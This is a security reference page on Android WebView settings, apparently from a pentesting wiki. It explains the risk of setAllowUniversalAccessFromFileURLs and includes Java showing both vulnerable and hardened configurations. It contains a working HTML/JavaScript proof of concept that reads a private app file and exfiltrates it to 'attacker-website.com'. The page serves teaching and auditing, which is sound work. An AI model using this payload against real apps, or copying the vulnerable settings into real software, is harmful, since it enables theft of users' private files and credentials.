
# WebSettings Vulnerabilities

## WebSettings Overview

[WebSettings](https://developer.android.com/reference/android/webkit/WebSettings) manages the settings state of a WebView. When a WebView is first created, it receives a set of default settings. The WebSettings object obtained from [WebView#getSettings()](https://developer.android.com/reference/android/webkit/WebView#getSettings%28%29) is tied to the lifetime of that WebView.

## Security Issues

### setAllowUniversalAccessFromFileURLs

[setAllowUniversalAccessFromFileURLs](https://developer.android.com/reference/android/webkit/WebSettings#setAllowUniversalAccessFromFileURLs%28boolean%29) sets whether cross-origin requests made from the context of a file-scheme URL are allowed to access content from **any origin**. This includes access to content from other file-scheme URLs and from web origins. Since Android 4.1 the default value is `false`.

{% hint style="info" %}
This method was deprecated in API level 30.
{% endhint %}

Enabling this setting allows a malicious script loaded in a `file://` context to launch cross-site scripting attacks and read arbitrary local files, including WebView cookies, the app's private data, and even credentials used on arbitrary websites.

For example, if the app lets you open arbitrary links in its WebView, you can pass it the path of a shared HTML file with the following contents to exfiltrate private files:

```html
<!-- file:///sdcard/index.html -->
<script>
    // A file inside the victim app's private data directory.
    var url = 'file:///data/data/com.victim.app/internal_folder/private_file.txt';
    var xhr = new XMLHttpRequest();
    xhr.onreadystatechange = function() {
        // readyState 4 means the local file has been read completely.
        if (xhr.readyState === 4) {
            // Send the file contents, base64-encoded, to the attacker's server.
            fetch('https://attacker-website.com/?content=' + btoa(xhr.responseText));
        }
    };
    // The read only succeeds because universal access from file URLs is enabled.
    xhr.open('GET', url, true);
    xhr.send('');
</script>
```
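The following Java class is an added illustration for this page, not code from any app or library the page describes. It shows the WebSettings state under which the HTML above succeeds next to a hardened configuration that pins every file-related flag to `false`, and it validates URLs taken from untrusted input before they reach `loadUrl()`. The class and method names (`WebViewFileAccessExample`, `configureVulnerable`, `configureHardened`, `loadUntrustedUrl`, `SchemeAllowListClient`) are hypothetical; the `WebSettings` and `WebViewClient` calls are the real Android framework APIs.

```java
import android.net.Uri;
import android.webkit.WebResourceRequest;
import android.webkit.WebSettings;
import android.webkit.WebView;
import android.webkit.WebViewClient;

/**
 * Added example (hypothetical class): the weak WebSettings state described on
 * this page beside a hardened one, plus input validation for untrusted URLs.
 */
public final class WebViewFileAccessExample {

    /** Vulnerable: the state under which a file:// page can read any local file. */
    public static void configureVulnerable(WebView webView) {
        WebSettings settings = webView.getSettings();
        settings.setJavaScriptEnabled(true);
        // Allows file:// URLs to be loaded at all.
        settings.setAllowFileAccess(true);
        // Lets scripts in file:// pages read other local files and reach any origin.
        settings.setAllowUniversalAccessFromFileURLs(true);
    }

    /** Hardened: set every file-related flag explicitly instead of trusting defaults. */
    public static void configureHardened(WebView webView) {
        WebSettings settings = webView.getSettings();
        // Scripts in file:// pages cannot reach other origins (deprecated in API 30,
        // but still worth pinning on older targets).
        settings.setAllowUniversalAccessFromFileURLs(false);
        // Scripts in file:// pages cannot read other file:// URLs.
        settings.setAllowFileAccessFromFileURLs(false);
        // The WebView refuses to load file:// URLs entirely.
        settings.setAllowFileAccess(false);
        // Block content:// provider access too unless the app genuinely needs it.
        settings.setAllowContentAccess(false);
        // Drop in-page navigations to anything that is not http(s).
        webView.setWebViewClient(new SchemeAllowListClient());
    }

    /** Only http and https are acceptable for user-supplied links. */
    public static boolean isAllowedScheme(Uri uri) {
        String scheme = uri.getScheme();
        return "https".equalsIgnoreCase(scheme) || "http".equalsIgnoreCase(scheme);
    }

    /**
     * Validate before loadUrl(): shouldOverrideUrlLoading is not invoked for
     * loads the app starts itself, so the check must happen here as well.
     * Returns true if the URL was loaded, false if it was rejected.
     */
    public static boolean loadUntrustedUrl(WebView webView, String untrustedUrl) {
        if (untrustedUrl == null) {
            return false;
        }
        Uri uri = Uri.parse(untrustedUrl.trim());
        if (!isAllowedScheme(uri)) {
            // A file:///sdcard/index.html link from an Intent extra lands here.
            return false;
        }
        webView.loadUrl(uri.toString());
        return true;
    }

    /** Cancels navigations (links, redirects, window.location) to non-http(s) schemes. */
    static final class SchemeAllowListClient extends WebViewClient {
        @Override
        public boolean shouldOverrideUrlLoading(WebView view, WebResourceRequest request) {
            // Returning true tells the WebView not to perform the navigation.
            return !isAllowedScheme(request.getUrl());
        }
    }
}
```

Note that `shouldOverrideUrlLoading` only covers navigations that originate inside the page; a `loadUrl()` call that the app makes with an attacker-controlled string bypasses it, which is why `loadUntrustedUrl` checks the scheme first. When auditing an app, look for `setAllowUniversalAccessFromFileURLs(true)` or `setAllowFileAccessFromFileURLs(true)` together with any code path that passes external input (Intent extras, deep links, push payloads) to `loadUrl()`.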
